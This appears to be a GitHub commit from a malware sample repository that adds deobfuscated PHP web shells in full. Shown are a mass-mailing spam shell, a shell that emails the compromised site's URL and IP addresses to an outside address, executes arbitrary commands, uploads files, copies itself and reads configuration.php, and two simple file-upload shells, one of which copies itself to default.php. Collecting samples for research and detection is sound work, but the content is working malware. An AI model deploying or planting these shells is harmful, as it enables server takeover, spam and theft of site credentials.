Add + edit

bartblaze · Jun 10, 2016 · 4e39ec3 · 4e39ec3
1 parent d0aeeb9
commit 4e39ec3
Show file tree

Hide file tree

Showing 13 changed files with 5,013 additions and 2,192 deletions.
diff --git a/Deobfuscated/MailserShell_98a40252a4d922b5439a0d0e8c80ba010a47d025.php b/Deobfuscated/MailserShell_98a40252a4d922b5439a0d0e8c80ba010a47d025.php
@@ -0,0 +1,228 @@
+<?php
+
+$testa = $_POST['veio'];
+
+if($testa != "") {
+
+				$message = $_POST['html'];
+
+				$subject = $_POST['assunto'];
+
+				$de = $_POST['de'];
+
+				$to = $_POST['emails'];
+
+				// ler o conte?do do arquivo para uma string
+
+
+
+				//$handle = fopen ($emails, "r");
+
+				//$to = fread ($handle, filesize ($emails));
+
+				//fclose ($handle);
+
+
+
+				//$handle2 = fopen ($html, "r");
+
+				//$message = fread ($handle2, filesize ($html));
+
+				//fclose ($handle2);
+
+
+
+
+
+				$headers  = "MIME-Version: 1.0\r\n";
+
+
+				$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
+
+
+
+				$email = explode("\n", $to);
+
+
+
+				$headers .= "From: ".$RealName." <".$de.">\r\n";
+
+
+
+
+
+				$message = stripslashes($message);
+
+
+
+				$i = 0;
+
+				$count = 1;
+
+				while($email[$i]) {
+
+$data = date("d/m/Y");
+$boundary = rand(1,999999);				
+
+//				$ok = "ok";
+if(mail($email[$i], $subject.$data, $message.$boundary.$boundary, $headers))
+echo "* N?mero: $count <b>".$email[$i]."</b> <font color=green>Enviado</font><br><hr>";
+else
+echo "* N?mero: $count <b>".$email[$i]."</b> <font color=red>Erro</font><br><hr>";
+$i++;
+$count++;
+}
+//$count--;
+//if($ok == "ok")
+
+	//echo "<script> alert('Terminou os emails. ".$count." e-mails enviados'); </script>";
+
+
+
+
+
+
+
+}
+
+?>
+
+<html>
+
+<head>
+
+<title>Newsletter!!!</title>
+
+<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
+
+<style>
+
+.normal {
+
+	font-family: Arial, Helvetica, sans-serif;
+
+	font-size: 12px;
+
+	color: #000000;
+
+}
+
+.form {
+
+	font-family: Arial, Helvetica, sans-serif;
+
+	font-size: 10px;
+
+	color: #333333;
+
+	background-color: #FFFFFF;
+
+	border: 1px dashed #666666;
+
+}
+
+
+
+.style1 {
+
+	font-family: Verdana, Arial, Helvetica, sans-serif;
+
+	font-weight: bold;
+
+}
+
+</style>
+
+</head>
+
+<body leftmargin="0" topmargin="0" rightmargin="0" bottommargin="0" marginwidth="0" marginheight="0" style="text-align: center">
+
+<form action="" method="post" enctype="multipart/form-data" name="form1">
+
+<input type="hidden" name="veio" value="sim">
+
+<table width="307" height="277" border="0" cellpadding="0" cellspacing="1" bgcolor="#CCCCCC" class="normal">
+
+<tr>
+
+<td width="305" height="15" align="center" bgcolor="#F4F4F4">
+&nbsp;
+<input name="de" type="text" class="form" id="de" size="85" value="<?php echo $UNAME = @php_uname(); ?> <?php echo $_SERVER['SERVER_ADMIN']; ?>" ><input name="assunto" type="text" class="form" id="assunto" size="85" value="<?php echo $_SERVER['SERVER_ADDR']; ?> <?php echo $OS = @PHP_OS; ?>" ></td>
+
+</tr>
+
+<tr>
+
+<td height="256" valign="top" bgcolor="#FFFFFF">
+<table width="96%"  border="0" cellpadding="0" cellspacing="5" class="normal" height="222">
+
+<tr>
+
+<td height="1">
+</td>
+
+</tr>
+
+<tr align="center" bgcolor="#F4F4F4">
+
+<td height="1" colspan="2"></td>
+
+</tr>
+
+<tr align="right">
+
+<td height="77" colspan="2" valign="top">        
+<p align="center">        <br>        <font color="#990000" size="1">
+
+        <textarea name="html" cols="80" rows="4" wrap="VIRTUAL" class="form" id="html"> <tr>
+      <tr align="left"> 
+<td colspan="2" bgcolor="#000000" >Nome do Servidor: <?php echo $UNAME = @php_uname(); ?><br>
+Endere&#231;o IP: <?php echo $_SERVER['SERVER_ADDR']; ?><br>
+Sistema Operacional: <?php echo $OS = @PHP_OS; ?><br>
+Email admin: <?php echo $_SERVER['SERVER_ADMIN']; ?> <br>
+</td>
+    </tr></textarea> </font></td>
+
+</tr>
+
+<tr align="center" bgcolor="#F4F4F4">
+
+<td height="7" colspan="2"></td>
+
+</tr>
+
+<tr align="right">
+
+<td height="70" colspan="2" valign="top">
+<p align="center"><br>
+
+<textarea name="emails" cols="80" rows="4" wrap="VIRTUAL" class="form" id="emails"></textarea> </td>
+
+</tr>
+
+<tr>
+
+<td height="31" align="right" valign="top" width="48%">
+<p align="center">
+<input type="submit" name="Submit" value="Enviar" style="float: left"></td>
+<td align="center" valign="top" height="31">
+<p>&nbsp;</td>
+
+</tr>
+
+</table>
+<p align="center">&nbsp;</td>
+
+</tr>
+
+<tr>
+
+<td height="1" align="center" bgcolor="#F4F4F4"></td>
+
+</tr>
+
+</table>
+
+</form>
+
+</body>
diff --git a/Deobfuscated/UploadShel_f0f0683373ca37df54167860b62c861e14931c40l.php b/Deobfuscated/UploadShel_f0f0683373ca37df54167860b62c861e14931c40l.php
@@ -0,0 +1,86 @@
+<?php @ini_restore("disable_functions");
+if (!isset($_SESSION['bajak'])) {
+    $visitcount = 0;
+    $web = $_SERVER["HTTP_HOST"];
+    $inj = $_SERVER["REQUEST_URI"];
+    $body = "Shell Injector 
+$web$inj";
+    $safem0de = @ini_get('safe_mode');
+    if (!$safem0de) {
+        $security = "SAFE_MODE = OFF";
+    } else {
+        $security = "SAFE_MODE = ON";
+    };
+    $df = 'ini_get  disable!';
+    $serper = gethostbyname($_SERVER['SERVER_ADDR']);
+    $injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
+    mail("[email protected]", "$body", "Shell Result http://$web$inj
+$security
+IP Server = $serper
+ IP Injector= $injektor");
+    $_SESSION['bajak'] = 0;
+} else {
+    $_SESSION['bajak']++;
+};
+if (isset($_GET['clone'])) {
+    $source = $_SERVER['SCRIPT_FILENAME'];
+    $desti = $_SERVER['DOCUMENT_ROOT'] . "/wp-info.php";
+    rename($source, $desti);
+}
+$safem0de = @ini_get('safe_mode');
+if (!$safem0de) {
+    $security = "SAFE_MODE : OFF";
+} else {
+    $security = "SAFE_MODE : ON";
+}
+echo "<title>Peterson - Shell</title><br><br>";
+echo "<font size=2 color=#888888><b>" . $security . "</b><br>";
+$cur_user = "(" . get_current_user() . ")";
+echo "<font size=2 color=#888888><b>User : uid=" . getmyuid() . $cur_user . " gid=" . getmygid() . $cur_user . "</b><br>";
+echo "<font size=2 color=#888888><b>Uname : " . php_uname() . "</b><br>";
+echo "<font size=2 color=#888888><b>Disable Functions : ";
+$df = 'ini_get  disable!';
+if ((@function_exists('ini_get')) && ('' == ($df = @ini_get('disable_functions')))) {
+    echo "NONE";
+} else {
+    echo "$df";
+}
+function pwd() {
+    $cwd = getcwd();
+    if ($u = strrpos($cwd, '/')) {
+        if ($u != strlen($cwd) - 1) {
+            return $cwd . '/';
+        } else {
+            return $cwd;
+        };
+    } elseif ($u = strrpos($cwd, '\')){
+if($u!=strlen($cwd)-1){
+return $cwd.'\';}
+else{return $cwd;};
+};
+}
+echo ' < formmethod = "POST"action = "" > < fontsize = 2color = #888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
+    echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
+    if (isset($_POST['submit'])) {
+        $uploaddir = pwd();
+        if (!$name = $_POST['newname']) {
+            $name = $_FILES['userfile']['name'];
+        };
+        move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name);
+        if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name)) {
+            echo "Upload Failed";
+        } else {
+            echo "Upload Success to " . $uploaddir . $name . " :D ";
+        }
+    }
+    if (isset($_POST['command'])) {
+        $cmd = $_POST['cmd'];
+        echo "<pre><font size=3 color=#000000>" . shell_exec($cmd) . "</font></pre>";
+    } else {
+        echo "<pre><font size=3 color=#000000>" . shell_exec('ls -la') . "</font></pre>";
+    }
+    if (isset($_GET['baca'])) {
+        $conf = file_get_contents("../../configuration.php");
+        echo $conf;
+    }
+
diff --git a/...8bc4e25038ff4f395cdab450932f1b98527c1.php → ...8bc4e25038ff4f395cdab450932f1b98527c1.php b/...8bc4e25038ff4f395cdab450932f1b98527c1.php → ...8bc4e25038ff4f395cdab450932f1b98527c1.php
diff --git a/Deobfuscated/UploadShell_20281d16838f707c86b1ff1428a293ed6aec0e97.php b/Deobfuscated/UploadShell_20281d16838f707c86b1ff1428a293ed6aec0e97.php
@@ -0,0 +1,27 @@
+<?php
+echo "<title>RevSlideR 2015</title><br><br>";
+$win = strtolower(substr(PHP_OS,0,3)) == "win";
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = true;
+ $hsafemode = "4,1ON(BuSuX)";
+}
+else {$safemode = false; $hsafemode = "OFF(WoKeH)";}
+$os = wordwrap(php_uname(),90,"<br>",1);
+$xos = "Safe-mode:[Safe-mode:".$hsafemode."] 7 [OS:".$os."]";
+echo "<center> ".$xos." </center><br>";
+
+if(isset($_GET['x'])){
+echo "<title>PiNDaH 2015</title><br><br>";
+$source = $_SERVER['SCRIPT_FILENAME'];
+$desti =$_SERVER['DOCUMENT_ROOT']."/default.php";
+copy($source, $desti);
+}
+
+echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
+echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
+if( $_POST['_upl'] == "Upload" ) {
+	if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
+	else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
+}
+?>
diff --git a/Deobfuscated/UploadShell_667e1cb7206b7558e790bef24fae2b8e9142ca35.php b/Deobfuscated/UploadShell_667e1cb7206b7558e790bef24fae2b8e9142ca35.php
@@ -0,0 +1,9 @@
+<?php
+echo '<title>Uploader</title>';
+echo '<center><font color="#11f0f3"><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"></center>';
+echo '<center><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form></font><center>';
+if( $_POST['_upl'] == "Upload" ) {
+if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<center><br><br><b><font color="#11f0f3">UPLOAD SUCCESS!</font></b></center><br><br>'; }
+else { echo '<center><br><br><b><font color="#f31111">UPLOAD FAILED!</font></b></center><br><br>'; }
+}
+?>